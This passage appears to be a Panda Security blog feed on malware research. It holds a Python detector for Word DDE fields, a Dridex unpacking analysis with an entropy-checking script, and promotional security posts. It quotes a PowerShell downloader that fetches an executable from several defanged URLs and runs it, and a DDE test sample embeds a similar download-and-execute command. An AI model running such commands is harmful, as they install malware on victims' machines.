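    pattern = re.compile(r"DDE(?:AUTO)?\s+[^\x00\x13\x14\x15\r\n]{4,}", re.IGNORECASE)
    views = [data.decode("latin-1"),
             data.decode("utf-16-le", errors="ignore"),
             data[1:].decode("utf-16-le", errors="ignore")]   # second alignment for UTF-16
    return [m.group(0) for view in views for m in pattern.finditer(view)]


def find_dde(data):
    """Return the command part of every DDE/DDEAUTO field in a .docx (zip) or raw .doc."""
    instructions = field_instructions_docx(data) if data[:2] == b"PK" else field_instructions_raw(data)
    hits = []
    for instr in instructions:
        m = DDE_RE.search(instr)
        if m:
            hits.append(m.group(1).strip())
    return hits


def build_sample_docx(instr_parts):
    """Constructed minimal .docx with one field whose instruction is split across runs."""
    runs = "".join('<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>' % escape(p)
                   for p in instr_parts)
    doc = ('<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
           '<w:body><w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>%s'
           '<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:t>Error!</w:t></w:r>'
           '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p></w:body></w:document>' % runs)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", doc)
    return buf.getvalue()


# Constructed samples; downloader.example.invalid is a placeholder, not a real host.
SAMPLE_DOCX = build_sample_docx([
    " DDE C:\\Windows\\System32\\cmd.exe ",
    "\"/k powershell -NoP -w hidden $e=(New-Object System.Net.WebClient)"
    ".DownloadString('hxxp://downloader.example.invalid/stage1');powershell -e $e\" ",
])
SAMPLE_BENIGN_DOCX = build_sample_docx([" PAGE ", "\\* MERGEFORMAT "])
SAMPLE_RAW_DOC = (b"\x00" * 16 + b"\x13 DDEAUTO c:\\windows\\system32\\cmd.exe \"/k calc\" "
                  b"\x14Error!\x15" + b"\x00" * 8)

if __name__ == "__main__":
    for label, blob in (("docx", SAMPLE_DOCX), ("benign", SAMPLE_BENIGN_DOCX), ("raw", SAMPLE_RAW_DOC)):
        print(label, find_dde(blob))
```

Joining the instrText runs per paragraph matters: a scanner that looks at each run separately never sees "DDE" and the executable path in one string, which is exactly the gap a split field exploits.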

The following powershell script is downloaded and executed:

$urls = "hxxp://shamanic-extracts.biz/eurgf837or","hxxp://centralbaptistchurchnj.org/eurgf837or","","hxxp://conxibit.com/eurgf837or"

foreach($url in $urls){
    try {
        # Each download location is tried in turn; the payload is written to %TEMP% and launched.
        Write-Host $url
        $fp = "$env:temp\rekakva32.exe"
        Write-Host $fp
        $wc = New-Object System.Net.WebClient
        $wc.DownloadFile($url, $fp)
        Start-Process $fp
    } catch {
        # A failed download (or the empty entry in the list) only prints the error and moves on.
        Write-Host $_.Exception.Message
    }
}

From this URL:


And a Trojan is downloaded (4F03E360BE488A3811D40C113292BC01).

MD5s from the Word document:


The post A New Attack Takes Advantage of an Exploit in Word appeared first on Panda Security Mediacenter.


Dridex, the Latest Version of the Credential Theft Malware

At the beginning of the year we talked about a new evolution of cyber theft in the banking sector, and today, we are pleased to share a report that has been painstakingly prepared by the malware laboratory at Panda Security on the latest version of Dridex, a famous banking Trojan known for its sophistication and ability to go undetected on infected computers.

What is Dridex?

This report analyzes a new variant of the malicious code known as “Dridex”, specifically its fourth version.

Dridex is a banking Trojan famous for its sophistication and its ability to go undetected on the devices it infects. These devices, once infected, are incorporated onto a modular botnet, at which point malicious characteristics, whether external or their own, can be freely added to them, via modules or libraries (sold separately).


The first version appeared toward the end of 2014. At the beginning of 2015, a new, important update was launched, giving way to a second version. When looking at the earlier versions of Dridex, the most stable and resistant of them was the third, which was launched in April 2015 and was used in well-known cyberattacks up until the fourth version, the latest known version and subject of this report, which was found in February of 2017.

No new major updates for Dridex had been found since the dismantlement of important components of the botnet, carried out by government agencies in 2015.

This new variant of the banking Trojan incorporates new functionalities. One of these is called AtomBombing, a functionality whose aim is to inject code without calling suspicious APIs to avoid being detected by monitoring systems. It incorporates the DLL hijacking technique to achieve persistence. Finally, various cryptographic methods were optimized and used to obtain the configuration.

Characteristics of the Trojan

The following are some static properties of the analyzed file.

The hashes of the Trojan:

MD5: 001fcf14529ac92a458836f7cec03896
SHA256: a6db7759c737cbf6335b6d77d43110044ec049e8d4cbf7fa9bd4087fa7e415c7


The internal creation date of the analyzed sample is May 16, 2017. The file was compiled to run in 64-bit environments and, at the same time, to masquerade as a legitimate Microsoft DLL.

Figure 1. File properties

Additionally, it is encrypted with its own distinctive algorithm to avoid detection by antivirus products.

It has been observed that the executable has a fairly high number of sections, 11 in total, as we can see in Figure 2:

Figure 2. Static information of the analyzed binary

In the DATA section, we can observe that the entropy is 7.799 and that the section is fairly large. It is in this section that the heavily encrypted and packed binary (which, once decrypted, becomes the real malicious code) is found.
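As a defensive triage check for the kind of high-entropy section described above, the following added example (not code from the Panda report) walks a PE's section table by hand and scores each section's entropy; the two-section PE it builds is constructed in-line for the demo and is not the Dridex sample.

```python
import math
import struct

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed
    bytes. Encrypted or packed payloads sit near 8.0 (7.799 in the report)."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def section_entropies(pe: bytes) -> dict:
    """Walk the IMAGE_SECTION_HEADER table by hand; return {name: (raw_size, entropy)}."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ/PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size          # first section header (40 bytes each)
    result = {}
    for i in range(num_sections):
        hdr = table + i * 40
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, hdr + 16)
        result[name] = (raw_size, round(shannon_entropy(pe[raw_ptr:raw_ptr + raw_size]), 3))
    return result

def suspicious_sections(pe: bytes, threshold: float = 7.0) -> list:
    """Names of sections whose entropy suggests an encrypted or packed payload."""
    return [n for n, (_, h) in section_entropies(pe).items() if h >= threshold]

def build_sample_pe() -> bytes:
    """Constructed two-section PE skeleton for the demo (not the Dridex sample):
    a .text of NOPs and a DATA section holding every byte value equally often."""
    text, data = b"\x90" * 4096, bytes(range(256)) * 16
    e_lfanew, text_off = 0x40, 0x200            # headers fit before 512-byte alignment
    data_off = text_off + len(text)
    def sec(name, size, ptr):                   # IMAGE_SECTION_HEADER, unused fields zero
        return struct.pack("<8sIIIIIIHHI", name, size, 0x1000, size, ptr, 0, 0, 0, 0, 0)
    pe = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew))
    pe += b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, 0, 0)  # no optional header
    pe += sec(b".text", len(text), text_off) + sec(b"DATA", len(data), data_off)
    pe += b"\0" * (text_off - len(pe)) + text + data
    return bytes(pe)
```

On a real file, `section_entropies(open(path, "rb").read())` flags the packed section the same way; a threshold around 7.0 is a common triage heuristic, not a definitive packer signature.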

In the first decrypted layer, the executable allocates memory in the process, copies the code into it and, finally, calls it and runs it, as we see in Figure 3:

Figure 3. Jump to shellcode

The first thing the code does is obtain the addresses of the functions it will eventually use. It does this with a dynamic search through the libraries loaded by the program.

To carry out this task, it walks the PEB_LDR_DATA structure and the LDR_MODULE structures to locate the base address of the loaded DLLs. It then accesses the offset of the export table in order to run through all of the functions exported by the DLL and find the address of the sought function in the computer’s memory.

Figure 4. Enumeration of loaded modules

The shellcode, in turn, checks whether there is a hook on the undocumented LdrLoadDll function by accessing its address and checking whether its first byte is E9, the opcode of a jmp instruction.

Figure 5. Hook Verification

If the previous check succeeds, it proceeds to unmap from the process the DLL named “snxhk.dll”, an Avast and AVG library that installs hooks to monitor processes running in the sandbox.

Figure 6. Library: snxhk.dll

Finally, the shellcode decrypts the executable found in the DATA section in the computer’s memory, copies it into the base image’s address, and then runs the new resulting executable.

Figure 7. Decrypted executable

In summary, the full unpacking process of the sample can be seen in Figure 8, where it is shown more schematically.

Figure 8. Complete unpacking process

Make sure to use advanced cybersecurity solutions like Adaptive Defense 360 that monitor the organization’s systems in real time, detecting and stopping any suspicious behavior that could be harmful to your business.

For more information, download the full report:

The post Dridex, the Latest Version of the Credential Theft Malware appeared first on Panda Security Mediacenter.


Enterprise Security in the Age of Advanced Threats


The malware and IT security landscape has undergone a major change, and enterprise security will never be the same. Attackers have improved drastically, both in volume and in sophistication, and new techniques are allowing threats to remain on corporate networks for far longer than ever before.

Webinar on the topic presented by Panda’s own Luis Corrons, Technical Director of PandaLabs.

How Predictive Intelligence Helps to Protect Companies

Protecting an enterprise is a challenge because it has hundreds of thousands of computers in its network, and a criminal needs to compromise only one of them to succeed. Security companies have been working for decades to advance security so that not even one computer is infected.

In the beginning it was easy: the number of threats was very low, so being able to identify all of them was enough to keep computers safe. Some of those threats were complex, causing a nightmare for antivirus companies, as it could take several days, even weeks, for the most expert researchers just to create a detection for them. The creators of these viruses were people trying to show off their abilities, and that was it; there was no ulterior motive.

As the internet grew, a clear ulterior motive emerged: money. Once cyber-criminals figured out how to benefit financially from these attacks, things really took off, and security companies, once again, had to adjust.

The number of new threats created is growing exponentially. In the old days a virus could take weeks or months to travel from LA to NY, now in a few seconds a virus could go from Washington DC to Tokyo.

Traditional anti-virus approaches included traditional blacklisting and whitelisting. Both blacklisting and whitelisting worked well for a while, but in the age of advanced threats, they can no longer be counted on. Cyber-criminals can try and fail a million times, but as soon as they get it right once, they win. It’s not a level playing field, and security solutions need to evolve to get ahead.

It is an uphill battle for security vendors, but as an industry, we know what it takes to combat the most sophisticated cyber-attacks. Now, it’s a matter of execution, and enterprises recognizing how important security is to their business objectives.


The post Enterprise Security in the Age of Advanced Threats appeared first on Panda Security Mediacenter.


PandaLabs Records a 40% Increase in Attacked Devices this Quarter

Traditional security solutions, although efficient in protecting against known malware, are incapable of protecting against attacks that use non-malicious tools and other advanced techniques. This argument has gained traction in recent investigations carried out by PandaLabs, the anti-malware laboratory at Panda Security. The laboratory presents its second quarterly report for 2017, which takes a look at some of the most harrowing months in cybersecurity in recent years.


The rise of cybercriminal groups, the hacking of elections in several countries, the leaking of espionage tools, and state-backed large-scale attacks — all of these factors have elevated cyberwarfare to the highest level, shaking the very foundations of cybersecurity across the world.

Main Conclusions from the Quarter:

  • Cybercriminal groups are on the rise: The Shadow Brokers plan to continue publishing stolen NSA data, and the cyberarms race is coming to a boil. Individuals and companies should take extra security precautions.
  • Individuals and businesses, in the crosshairs: Out of all the machines protected by a Panda Security solution, 3.44% of them were attacked by unknown threats, representing an increase of almost 40% from the previous quarter. If we look at the type of client, home users and small businesses make up 3.81% of attacks, while in the case of medium and large companies the figure is 2.28%. Home users have far fewer protective measures in place, and they are therefore more exposed to attacks. Many attacks that successfully run their course in a home setting are easily contained in corporate networks before they can have an effect.
  • Cyberwarfare: the second quarter of the year has marked two of the largest cyberattacks in history. WannaCry and Petya have shown us that governments are not hesitating to “push the button” when it comes to launching a cyberattack and that everyone who uses the internet or connected devices could end up being a collateral victim on the global stage of cyberwarfare. The following are some figures describing the extent and damage of WannaCry:
  • Ransomware attacks are still on the rise, and the only explanation is that there are still victims willing to pay. Otherwise, attacks of this sort would eventually be phased out. It is up to all of us to put an end to these attacks, on the one hand protecting ourselves against becoming victims, and on the other always keeping a backup of our data so as to never pay a ransom.
  • “Zero-day” attacks are the most sought-after exploits for launching attacks, as they are completely unknown to the manufacturer of the affected software and allow attackers to compromise computers even if their software is up to date. In April, a vulnerability was discovered which affected various versions of Microsoft Word, and we know that it was being used by attackers from at least January. In that same month of April, Microsoft published a corresponding update to protect Office users.
  • IoT and Smart Cities: hyperconnected cities bring immense security risks that give attackers a multitude of new vectors. Last June, WannaCry infected 55 cameras located at traffic lights and speed control points in Australia after a subcontractor connected an infected computer to the network where they were located. Police had to cancel 8,000 traffic fines following the incident.

PandaLabs Cybersecurity Recommendations

In this context, reinventing cybersecurity with software that can measure up to the threats we face has become a matter of urgency. Only a solution like Panda Adaptive Defense, which combines EDR (Endpoint Detection & Response) technology with the ability to monitor and classify 100% of running processes can reduce the possibility of falling victim to advanced attacks such as those described in this report.

The post PandaLabs Records a 40% Increase in Attacked Devices this Quarter appeared first on Panda Security Mediacenter.
